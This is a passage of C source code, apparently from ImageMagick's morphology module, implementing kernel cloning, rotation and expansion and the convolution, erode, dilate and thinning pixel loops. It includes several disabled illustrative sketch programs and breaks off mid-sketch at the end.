return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*sqrt((double)(u*u+v*v)) );
kernel->maximum = kernel->values[0];
break;
}
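/* Illustrative sketch (not part of the library): the distance kernels above
** differ only in the metric applied to each (u,v) offset -- Chebyshev
** max(|u|,|v|), Manhattan |u|+|v|, and Euclidean sqrt(u*u+v*v). This prints
** one row of each metric for a radius-2 kernel.
*/
#if 0
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
int main(void)
{
long u, v = -1; /* second row of a 5x5 kernel */
for (u = -2; u <= 2; u++)
printf("u=%2ld chebyshev=%ld manhattan=%ld euclidean=%g\n", u,
labs(u) > labs(v) ? labs(u) : labs(v), labs(u)+labs(v),
sqrt((double)(u*u+v*v)));
return(0);
}
#endif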
default:
{
/* No-Op Kernel - Basically just a single pixel on its own */
kernel=ParseKernelArray("1:1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = UndefinedKernel;
break;
}
break;
}
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% C l o n e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% CloneKernelInfo() creates a new clone of the given Kernel List so that it
% can be modified without affecting the original. The cloned kernel should
% be destroyed using DestroyKernelInfo() when no longer needed.
%
% The format of the CloneKernelInfo method is:
%
% KernelInfo *CloneKernelInfo(const KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to be cloned
%
*/
MagickExport KernelInfo *CloneKernelInfo(const KernelInfo *kernel)
{
register ssize_t
i;
KernelInfo
*new_kernel;
assert(kernel != (KernelInfo *) NULL);
new_kernel=(KernelInfo *) AcquireMagickMemory(sizeof(*kernel));
if (new_kernel == (KernelInfo *) NULL)
return(new_kernel);
*new_kernel=(*kernel); /* copy values in structure */
/* replace the values with a copy of the values */
new_kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*sizeof(*kernel->values)));
if (new_kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(new_kernel));
for (i=0; i < (ssize_t) (kernel->width*kernel->height); i++)
new_kernel->values[i]=kernel->values[i];
/* Also clone the next kernel in the kernel list */
if ( kernel->next != (KernelInfo *) NULL ) {
new_kernel->next = CloneKernelInfo(kernel->next);
if ( new_kernel->next == (KernelInfo *) NULL )
return(DestroyKernelInfo(new_kernel));
}
return(new_kernel);
}
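/* Illustrative sketch (not part of the library): a typical use of
** CloneKernelInfo() is to take a private copy of a caller's kernel list
** before normalizing it, so the caller's kernel is left untouched. This
** fragment assumes it sits inside a function with a 'kernel' argument.
*/
#if 0
KernelInfo
*curr_kernel;
curr_kernel=CloneKernelInfo(kernel); /* deep copy of the whole list */
if (curr_kernel == (KernelInfo *) NULL)
return((Image *) NULL);
ScaleKernelInfo(curr_kernel,1.0,NormalizeValue); /* modify the copy only */
/* ... use curr_kernel ... */
curr_kernel=DestroyKernelInfo(curr_kernel);
#endif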
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e s t r o y K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DestroyKernelInfo() frees the memory used by a Convolution/Morphology
% kernel.
%
% The format of the DestroyKernelInfo method is:
%
% KernelInfo *DestroyKernelInfo(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to be destroyed
%
*/
MagickExport KernelInfo *DestroyKernelInfo(KernelInfo *kernel)
{
assert(kernel != (KernelInfo *) NULL);
if (kernel->next != (KernelInfo *) NULL)
kernel->next=DestroyKernelInfo(kernel->next);
kernel->values=(MagickRealType *) RelinquishAlignedMemory(kernel->values);
kernel=(KernelInfo *) RelinquishMagickMemory(kernel);
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ E x p a n d M i r r o r K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ExpandMirrorKernelInfo() takes a single kernel, and expands it into a
% sequence of 90-degree rotated kernels, providing a reflected 180-degree
% rotation before the -/+ 90-degree rotations.
%
% This special rotation order produces a better, more symmetrical thinning of
% objects.
%
% The format of the ExpandMirrorKernelInfo method is:
%
% void ExpandMirrorKernelInfo(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% This function is only internal to this module, as it is not finalized,
% especially with regard to non-orthogonal angles, and rotation of larger
% 2D kernels.
*/
#if 0
static void FlopKernelInfo(KernelInfo *kernel)
{ /* Do a Flop by reversing each row. */
size_t
y;
register ssize_t
x,r;
register MagickRealType
*k,t;
for ( y=0, k=kernel->values; y < kernel->height; y++, k+=kernel->width)
for ( x=0, r=(ssize_t) kernel->width-1; x < (ssize_t) (kernel->width/2); x++, r--)
t=k[x], k[x]=k[r], k[r]=t;
kernel->x = (ssize_t) kernel->width - kernel->x - 1;
}
#endif
static void ExpandMirrorKernelInfo(KernelInfo *kernel)
{
KernelInfo
*clone,
*last;
last = kernel;
clone = CloneKernelInfo(last);
if (clone == (KernelInfo *) NULL)
return;
RotateKernelInfo(clone, 180); /* flip */
LastKernelInfo(last)->next = clone;
last = clone;
clone = CloneKernelInfo(last);
if (clone == (KernelInfo *) NULL)
return;
RotateKernelInfo(clone, 90); /* transpose */
LastKernelInfo(last)->next = clone;
last = clone;
clone = CloneKernelInfo(last);
if (clone == (KernelInfo *) NULL)
return;
RotateKernelInfo(clone, 180); /* flop */
LastKernelInfo(last)->next = clone;
return;
}
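/* Illustrative sketch (not part of the library): the expansion above turns
** one kernel into four by rotating each new clone of the previous one, so
** the angles accumulate as 0 -> 180 -> 270 -> 90 -- the reflected 180
** rotation comes before the -/+ 90-degree forms.
*/
#if 0
#include <stdio.h>
int main(void)
{
int steps[3] = { 180, 90, 180 }, angle = 0, i; /* rotations applied above */
printf("%d ", angle);
for (i = 0; i < 3; i++) {
angle=(angle+steps[i]) % 360;
printf("%d ", angle); /* prints: 0 180 270 90 */
}
printf("\n");
return(0);
}
#endif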
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ E x p a n d R o t a t e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ExpandRotateKernelInfo() takes a kernel list, and expands it by rotating
% incrementally by the angle given, until the kernel repeats.
%
% WARNING: 45-degree rotations only work for 3x3 kernels,
% while 90-degree rotations only work for linear and square kernels.
%
% The format of the ExpandRotateKernelInfo method is:
%
% void ExpandRotateKernelInfo(KernelInfo *kernel, double angle)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o angle: angle to rotate in degrees
%
% This function is only internal to this module, as it is not finalized,
% especially with regard to non-orthogonal angles, and rotation of larger
% 2D kernels.
*/
/* Internal Routine - Return true if two kernels are the same */
static MagickBooleanType SameKernelInfo(const KernelInfo *kernel1,
const KernelInfo *kernel2)
{
register size_t
i;
/* check size and origin location */
if ( kernel1->width != kernel2->width
|| kernel1->height != kernel2->height
|| kernel1->x != kernel2->x
|| kernel1->y != kernel2->y )
return MagickFalse;
/* check actual kernel values */
for (i=0; i < (kernel1->width*kernel1->height); i++) {
/* Test for Nan equivalence */
if ( IsNaN(kernel1->values[i]) && !IsNaN(kernel2->values[i]) )
return MagickFalse;
if ( IsNaN(kernel2->values[i]) && !IsNaN(kernel1->values[i]) )
return MagickFalse;
/* Test actual values are equivalent */
if ( fabs(kernel1->values[i] - kernel2->values[i]) >= MagickEpsilon )
return MagickFalse;
}
return MagickTrue;
}
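/* Illustrative sketch (not part of the library): SameKernelInfo() must
** treat two NaN entries as equal, since NaN == NaN is false in plain C.
** The same NaN-aware comparison for two raw arrays:
*/
#if 0
#include <stdio.h>
#include <math.h>
static int same_values(const double *a, const double *b, size_t n)
{
size_t i;
for (i = 0; i < n; i++) {
if ((isnan(a[i]) != 0) != (isnan(b[i]) != 0)) /* NaN in only one array */
return(0);
if (!isnan(a[i]) && fabs(a[i]-b[i]) >= 1.0e-12)
return(0);
}
return(1);
}
int main(void)
{
double a[3] = { 1.0, NAN, 0.5 }, b[3] = { 1.0, NAN, 0.5 };
printf("%s\n", same_values(a,b,3) ? "same" : "different");
return(0);
}
#endif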
static void ExpandRotateKernelInfo(KernelInfo *kernel, const double angle)
{
KernelInfo
*clone_info,
*last;
last=kernel;
DisableMSCWarning(4127)
while (1) {
RestoreMSCWarning
clone_info=CloneKernelInfo(last);
if (clone_info == (KernelInfo *) NULL)
break;
RotateKernelInfo(clone_info,angle);
if (SameKernelInfo(kernel,clone_info) != MagickFalse)
break;
LastKernelInfo(last)->next=clone_info;
last=clone_info;
}
if (clone_info != (KernelInfo *) NULL)
clone_info=DestroyKernelInfo(clone_info); /* kernel repeated - junk */
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ C a l c K e r n e l M e t a D a t a %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% CalcKernelMetaData() recalculates the KernelInfo meta-data of this kernel
% only, using the kernel values. This should only be used if it is not
% possible to calculate that meta-data in some easier way.
%
% It is important that the meta-data is correct before ScaleKernelInfo() is
% used to perform kernel normalization.
%
% The format of the CalcKernelMetaData method is:
%
% void CalcKernelMetaData(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to modify
%
% WARNING: Minimum and Maximum values are assumed to include zero, even if
% zero is not part of the kernel (as in Gaussian Derived kernels). This
% however is not true for flat-shaped morphological kernels.
%
% WARNING: Only the specific kernel pointed to is modified, not a list of
% multiple kernels.
%
% This is an internal function and not expected to be useful outside this
% module. This could change however.
*/
static void CalcKernelMetaData(KernelInfo *kernel)
{
register size_t
i;
kernel->minimum = kernel->maximum = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
for (i=0; i < (kernel->width*kernel->height); i++)
{
if ( fabs(kernel->values[i]) < MagickEpsilon )
kernel->values[i] = 0.0;
( kernel->values[i] < 0)
? ( kernel->negative_range += kernel->values[i] )
: ( kernel->positive_range += kernel->values[i] );
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
}
return;
}
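/* Illustrative sketch (not part of the library): the meta-data pass above,
** reduced to a standalone loop -- positive and negative sums are kept
** separately, and minimum/maximum always include zero.
*/
#if 0
#include <stdio.h>
int main(void)
{
const double values[9] = { -1,-1,-1, -1,8,-1, -1,-1,-1 }; /* laplacian */
double minimum = 0.0, maximum = 0.0, negative = 0.0, positive = 0.0;
int i;
for (i = 0; i < 9; i++) {
if (values[i] < 0.0) negative += values[i];
else positive += values[i];
if (values[i] < minimum) minimum = values[i];
if (values[i] > maximum) maximum = values[i];
}
printf("min=%g max=%g neg=%g pos=%g\n", minimum, maximum, negative,
positive); /* prints: min=-1 max=8 neg=-8 pos=8 */
return(0);
}
#endif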
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M o r p h o l o g y A p p l y %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% MorphologyApply() applies a morphological method, multiple times using
% a list of multiple kernels. This is the method that should be called by
% other 'operators' that internally use morphology operations as part of
% their processing.
%
% It is basically equivalent to MorphologyImage() (see below) but without
% any user controls. This allows internal programs to use this method to
% perform a specific task without possible interference by any API user
% supplied settings.
%
% It is MorphologyImage()'s task to extract any such user controls, and
% pass them to this function for processing.
%
% More specifically, all given kernels should already be scaled, normalised,
% and blended appropriately before being passed to this routine, with the
% appropriate bias and compose method (typically 'UndefinedCompositeOp') given.
%
% The format of the MorphologyApply method is:
%
% Image *MorphologyApply(const Image *image,MorphologyMethod method,
% const ssize_t iterations,const KernelInfo *kernel,
% const CompositeMethod compose,const double bias,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the source image
%
% o method: the morphology method to be applied.
%
% o iterations: apply the operation this many times (or until no change).
% A value of -1 means loop until no change found.
% How this is applied may depend on the morphology method.
% Typically this is a value of 1.
%
% o channel: the channel type.
%
% o kernel: An array of double representing the morphology kernel.
%
% o compose: How to handle or merge multi-kernel results.
% If 'UndefinedCompositeOp' use default for the Morphology method.
% If 'NoCompositeOp' force image to be re-iterated by each kernel.
% Otherwise merge the results using the compose method given.
%
% o bias: Convolution Output Bias.
%
% o exception: return any errors or warnings in this structure.
%
*/
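/* Illustrative sketch (not part of the library source): how an internal
** operator might call MorphologyApply() with a pre-built kernel. The
** kernel string and settings here are only an example; the fragment
** assumes a function with 'image' and 'exception' in scope.
*/
#if 0
Image
*edge_image;
KernelInfo
*kernel;
kernel=AcquireKernelInfo("Sobel",exception);
if (kernel == (KernelInfo *) NULL)
return((Image *) NULL);
edge_image=MorphologyApply(image,ConvolveMorphology,1,kernel,
UndefinedCompositeOp,0.0,exception);
kernel=DestroyKernelInfo(kernel);
#endif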
static ssize_t MorphologyPrimitive(const Image *image,Image *morphology_image,
const MorphologyMethod method,const KernelInfo *kernel,const double bias,
ExceptionInfo *exception)
{
#define MorphologyTag "Morphology/Image"
CacheView
*image_view,
*morphology_view;
OffsetInfo
offset;
register ssize_t
j,
y;
size_t
*changes,
changed,
width;
MagickBooleanType
status;
MagickOffsetType
progress;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
assert(morphology_image != (Image *) NULL);
assert(morphology_image->signature == MagickCoreSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickCoreSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
status=MagickTrue;
progress=0;
image_view=AcquireVirtualCacheView(image,exception);
morphology_view=AcquireAuthenticCacheView(morphology_image,exception);
width=image->columns+kernel->width-1;
offset.x=0;
offset.y=0;
switch (method)
{
case ConvolveMorphology:
case DilateMorphology:
case DilateIntensityMorphology:
case IterativeDistanceMorphology:
{
/*
Kernel needs to be used with reflection about the origin.
*/
offset.x=(ssize_t) kernel->width-kernel->x-1;
offset.y=(ssize_t) kernel->height-kernel->y-1;
break;
}
case ErodeMorphology:
case ErodeIntensityMorphology:
case HitAndMissMorphology:
case ThinningMorphology:
case ThickenMorphology:
{
offset.x=kernel->x;
offset.y=kernel->y;
break;
}
default:
{
assert("Not a Primitive Morphology Method" != (char *) NULL);
break;
}
}
changed=0;
changes=(size_t *) AcquireQuantumMemory(GetOpenMPMaximumThreads(),
sizeof(*changes));
if (changes == (size_t *) NULL)
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
for (j=0; j < (ssize_t) GetOpenMPMaximumThreads(); j++)
changes[j]=0;
if ((method == ConvolveMorphology) && (kernel->width == 1))
{
register ssize_t
x;
/*
Special handling (for speed) of vertical (blur) kernels. This performs
its handling in columns rather than in rows. This is only done
for convolve, as it is the only method that generates very large 1-D
vertical kernels (such as a 'BlurKernel').
*/
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(progress,status) \
magick_threads(image,morphology_image,image->columns,1)
#endif
for (x=0; x < (ssize_t) image->columns; x++)
{
const int
id = GetOpenMPThreadId();
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
register ssize_t
r;
ssize_t
center;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,x,-offset.y,1,image->rows+
kernel->height-1,exception);
q=GetCacheViewAuthenticPixels(morphology_view,x,0,1,
morphology_image->rows,exception);
if ((p == (const Quantum *) NULL) || (q == (Quantum *) NULL))
{
status=MagickFalse;
continue;
}
center=(ssize_t) GetPixelChannels(image)*offset.y;
for (r=0; r < (ssize_t) image->rows; r++)
{
register ssize_t
i;
for (i=0; i < (ssize_t) GetPixelChannels(image); i++)
{
double
alpha,
gamma,
pixel;
PixelChannel
channel;
PixelTrait
morphology_traits,
traits;
register const MagickRealType
*magick_restrict k;
register const Quantum
*magick_restrict pixels;
register ssize_t
v;
size_t
count;
channel=GetPixelChannelChannel(image,i);
traits=GetPixelChannelTraits(image,channel);
morphology_traits=GetPixelChannelTraits(morphology_image,channel);
if ((traits == UndefinedPixelTrait) ||
(morphology_traits == UndefinedPixelTrait))
continue;
if (((traits & CopyPixelTrait) != 0) ||
(GetPixelWriteMask(image,p+center) <= (QuantumRange/2)))
{
SetPixelChannel(morphology_image,channel,p[center+i],q);
continue;
}
k=(&kernel->values[kernel->height-1]);
pixels=p;
pixel=bias;
gamma=0.0;
count=0;
if ((morphology_traits & BlendPixelTrait) == 0)
for (v=0; v < (ssize_t) kernel->height; v++)
{
if (!IsNaN(*k))
{
pixel+=(*k)*pixels[i];
gamma+=(*k);
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
else
for (v=0; v < (ssize_t) kernel->height; v++)
{
if (!IsNaN(*k))
{
alpha=(double) (QuantumScale*GetPixelAlpha(image,pixels));
pixel+=alpha*(*k)*pixels[i];
gamma+=alpha*(*k);
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
if (fabs(pixel-p[center+i]) > MagickEpsilon)
changes[id]++;
gamma=PerceptibleReciprocal(gamma);
if (count != 0)
gamma*=(double) kernel->height/count;
SetPixelChannel(morphology_image,channel,ClampToQuantum(gamma*
pixel),q);
}
p+=GetPixelChannels(image);
q+=GetPixelChannels(morphology_image);
}
if (SyncCacheViewAuthenticPixels(morphology_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_MorphologyPrimitive)
#endif
proceed=SetImageProgress(image,MorphologyTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
morphology_image->type=image->type;
morphology_view=DestroyCacheView(morphology_view);
image_view=DestroyCacheView(image_view);
for (j=0; j < (ssize_t) GetOpenMPMaximumThreads(); j++)
changed+=changes[j];
changes=(size_t *) RelinquishMagickMemory(changes);
return(status ? (ssize_t) changed : 0);
}
/*
Normal handling of horizontal or rectangular kernels (row by row).
*/
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(progress,status) \
magick_threads(image,morphology_image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
register ssize_t
x;
ssize_t
center;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,-offset.x,y-offset.y,width,
kernel->height,exception);
q=GetCacheViewAuthenticPixels(morphology_view,0,y,morphology_image->columns,
1,exception);
if ((p == (const Quantum *) NULL) || (q == (Quantum *) NULL))
{
status=MagickFalse;
continue;
}
center=(ssize_t) (GetPixelChannels(image)*width*offset.y+
GetPixelChannels(image)*offset.x);
for (x=0; x < (ssize_t) image->columns; x++)
{
register ssize_t
i;
for (i=0; i < (ssize_t) GetPixelChannels(image); i++)
{
double
alpha,
gamma,
intensity,
maximum,
minimum,
pixel;
PixelChannel
channel;
PixelTrait
morphology_traits,
traits;
register const MagickRealType
*magick_restrict k;
register const Quantum
*magick_restrict pixels;
register ssize_t
u;
size_t
count;
ssize_t
v;
channel=GetPixelChannelChannel(image,i);
traits=GetPixelChannelTraits(image,channel);
morphology_traits=GetPixelChannelTraits(morphology_image,channel);
if ((traits == UndefinedPixelTrait) ||
(morphology_traits == UndefinedPixelTrait))
continue;
if (((traits & CopyPixelTrait) != 0) ||
(GetPixelWriteMask(image,p+center) <= (QuantumRange/2)))
{
SetPixelChannel(morphology_image,channel,p[center+i],q);
continue;
}
pixels=p;
maximum=0.0;
minimum=(double) QuantumRange;
count=kernel->width*kernel->height;
switch (method)
{
case ConvolveMorphology: pixel=bias; break;
case DilateMorphology:
case ErodeIntensityMorphology:
{
pixel=0.0;
break;
}
default:
{
pixel=(double) p[center+i];
break;
}
}
gamma=1.0;
switch (method)
{
case ConvolveMorphology:
{
/*
Weighted Average of pixels using reflected kernel
For correct working of this operation for asymmetrical kernels,
the kernel needs to be applied in its reflected form. That is
its values need to be reversed.
Correlation is actually the same as this but without reflecting
the kernel, and thus 'lower-level' than Convolution. However, as
Convolution is the more common method, and a reflected kernel does
not really cost us much in terms of processing, it is Convolution
that is implemented.
Correlation will have its kernel reflected before calling this
function to do a Convolve.
For more details of Correlation vs Convolution see
http://www.cs.umd.edu/~djacobs/CMSC426/Convolution.pdf
*/
k=(&kernel->values[kernel->width*kernel->height-1]);
count=0;
if ((morphology_traits & BlendPixelTrait) == 0)
{
/*
No alpha blending.
*/
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
pixel+=(*k)*pixels[i];
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
/*
Alpha blending.
*/
gamma=0.0;
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
alpha=(double) (QuantumScale*GetPixelAlpha(image,pixels));
pixel+=alpha*(*k)*pixels[i];
gamma+=alpha*(*k);
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case ErodeMorphology:
{
/*
Minimum value within kernel neighbourhood.
The kernel is not reflected for this operation. In normal
Greyscale Morphology, the kernel value should be added
to the real value; this is currently not done, due to the
nature of the boolean kernels being used.
*/
k=kernel->values;
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k) && (*k >= 0.5))
{
if ((double) pixels[i] < pixel)
pixel=(double) pixels[i];
}
k++;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case DilateMorphology:
{
/*
Maximum value within kernel neighbourhood.
For correct working of this operation for asymmetrical kernels,
the kernel needs to be applied in its reflected form. That is
its values need to be reversed.
In normal Greyscale Morphology, the kernel value should be
added to the real value; this is currently not done, due to the
nature of the boolean kernels being used.
*/
count=0;
k=(&kernel->values[kernel->width*kernel->height-1]);
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k) && (*k > 0.5))
{
if ((double) pixels[i] > pixel)
pixel=(double) pixels[i];
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case HitAndMissMorphology:
case ThinningMorphology:
case ThickenMorphology:
{
/*
Minimum of foreground pixels minus maximum of background pixels.
The kernel is not reflected for this operation, and consists
of both foreground and background pixel neighbourhoods, 0.0 for
background, and 1.0 for foreground, with either NaN or 0.5 values
for don't care.
The result is clamped at zero, as a meaningless negative result
would cause Thinning/Thicken to not work correctly when used
against a greyscale image.
*/
count=0;
k=kernel->values;
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if (*k > 0.7)
{
if ((double) pixels[i] < pixel)
pixel=(double) pixels[i];
}
else
if (*k < 0.3)
{
if ((double) pixels[i] > maximum)
maximum=(double) pixels[i];
}
count++;
}
k++;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
pixel-=maximum;
if (pixel < 0.0)
pixel=0.0;
if (method == ThinningMorphology)
pixel=(double) p[center+i]-pixel;
else
if (method == ThickenMorphology)
pixel+=(double) p[center+i]+pixel;
break;
}
case ErodeIntensityMorphology:
{
/*
Select pixel with minimum intensity within kernel neighbourhood.
The kernel is not reflected for this operation.
*/
count=0;
k=kernel->values;
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k) && (*k >= 0.5))
{
intensity=(double) GetPixelIntensity(image,pixels);
if (intensity < minimum)
{
pixel=(double) pixels[i];
minimum=intensity;
}
count++;
}
k++;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case DilateIntensityMorphology:
{
/*
Select pixel with maximum intensity within kernel neighbourhood.
The kernel is not reflected for this operation.
*/
count=0;
k=(&kernel->values[kernel->width*kernel->height-1]);
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k) && (*k >= 0.5))
{
intensity=(double) GetPixelIntensity(image,pixels);
if (intensity > maximum)
{
pixel=(double) pixels[i];
maximum=intensity;
}
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case IterativeDistanceMorphology:
{
/*
Compute the iterative distance from the black edge of a white
image shape. Essentially white values are decreased to the
smallest 'distance from edge' that can be found.
It works by adding kernel values to the neighbourhood, and
selecting the minimum value found. The kernel is rotated before
use, so kernel distances match resulting distances when a user
provided asymmetric kernel is applied.
This code is nearly identical to true GrayScale Morphology, but
not quite:
GreyDilate: kernel values added, maximum value found; kernel is
rotated before use.
GrayErode: kernel values subtracted, minimum value found; no
kernel rotation used.
Note that the Iterative Distance method is essentially a
GrayErode, but with negative kernel values and kernel rotation
applied.
*/
count=0;
k=(&kernel->values[kernel->width*kernel->height-1]);
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case UndefinedMorphology:
default:
break;
}
if (fabs(pixel-p[center+i]) > MagickEpsilon)
changes[id]++;
gamma=PerceptibleReciprocal(gamma);
if (count != 0)
gamma*=(double) kernel->height*kernel->width/count;
SetPixelChannel(morphology_image,channel,ClampToQuantum(gamma*pixel),q);
}
p+=GetPixelChannels(image);
q+=GetPixelChannels(morphology_image);
}
if (SyncCacheViewAuthenticPixels(morphology_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_MorphologyPrimitive)
#endif
proceed=SetImageProgress(image,MorphologyTag,progress++,image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
morphology_view=DestroyCacheView(morphology_view);
image_view=DestroyCacheView(image_view);
for (j=0; j < (ssize_t) GetOpenMPMaximumThreads(); j++)
changed+=changes[j];
changes=(size_t *) RelinquishMagickMemory(changes);
return(status ? (ssize_t) changed : -1);
}
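/* Illustrative sketch (not part of the library): the convolution inner loop
** above, reduced to 1-D -- the kernel is walked backward (reflection), NaN
** entries are skipped, and the result is re-normalized by the sum of the
** weights actually used.
*/
#if 0
#include <stdio.h>
#include <math.h>
int main(void)
{
const double pixels[5] = { 0, 0, 100, 0, 0 };
const double weights[3] = { 0.25, 0.5, NAN }; /* NaN entry is skipped */
const double *k = &weights[2]; /* start at the last entry: reflection */
double gamma = 0.0, pixel = 0.0;
int count = 0, v;
for (v = 0; v < 3; v++, k--)
if (!isnan(*k)) {
pixel += (*k)*pixels[1+v];
gamma += (*k); /* sum of the weights actually used */
count++;
}
if ((count != 0) && (gamma > 1.0e-12))
pixel /= gamma; /* re-normalize for the skipped entries */
printf("result=%g\n", pixel); /* prints: result=66.6667 */
return(0);
}
#endif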
/*
This is almost identical to the MorphologyPrimitive() function above, but
applies the primitive directly to the actual image using two passes, once in
each direction, with the results of the previous (and current) row being
re-used.
That is, after each row is 'Sync'ed' into the image, the next row makes use
of those values as part of the calculation of the next row. It repeats, but
going in the opposite (bottom-up) direction.
Because of this 're-use of results' this function cannot make use of
multi-threaded, parallel processing.
*/
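/* Illustrative sketch (not part of the library): the two-pass distance
** transform on a 1-D array. The forward pass propagates distances from the
** left using already-updated cells; the backward pass does the same from
** the right. Background cells start at 0, foreground at a large value.
*/
#if 0
#include <stdio.h>
int main(void)
{
int d[8] = { 0, 999, 999, 999, 999, 999, 0, 999 }, i;
for (i = 1; i < 8; i++) /* forward pass, re-using updated cells */
if (d[i-1]+1 < d[i]) d[i] = d[i-1]+1;
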